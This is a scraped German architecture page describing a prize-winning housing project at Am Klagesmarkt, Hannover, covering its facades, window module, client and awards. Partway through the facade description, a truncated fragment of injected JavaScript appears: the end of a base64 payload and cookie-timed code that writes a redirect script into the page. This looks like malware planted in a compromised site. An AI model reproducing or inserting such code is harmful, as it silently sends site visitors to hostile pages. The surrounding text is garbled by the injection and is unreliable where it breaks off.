• Lade...
  • Lade...
  • Lade...
  • Lade...
  • Lade...
  • Lade...
  • Lade...

Am Klagesmarkt Hannover, 1. Preis 2013

Die Gebäude werden als Stadtbauten begriffen, die sich dem Thema “Vielfalt in der Einheit” verpflichtet fühlen.

Die Fassaden bestehen aus traditionellen Ringofen-Klinkern in Wechselsortierung, mit deutlich zurückliegender anthrazitfarbener Verfugung.

Die Fensteröffnungen unterliegen einem Modul, welches in der Anwendung ein Spiel an unterschiedlichen, aber ähnlichen Fenstergrößen, ermöglicht. Ein schmales Stahlband (U-Profil), auf der Ebene der Geschossdecke, strukturiert die Fassade horizontal. yU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Bauherr:hanova Fotos:Langreder Wettbewerb:1. Preis Gebäude 2
2. Preis Gebäude 5
2. Preis Gebäude 7
Jahr:2013 Fertigstellung:2016 Gebäude 2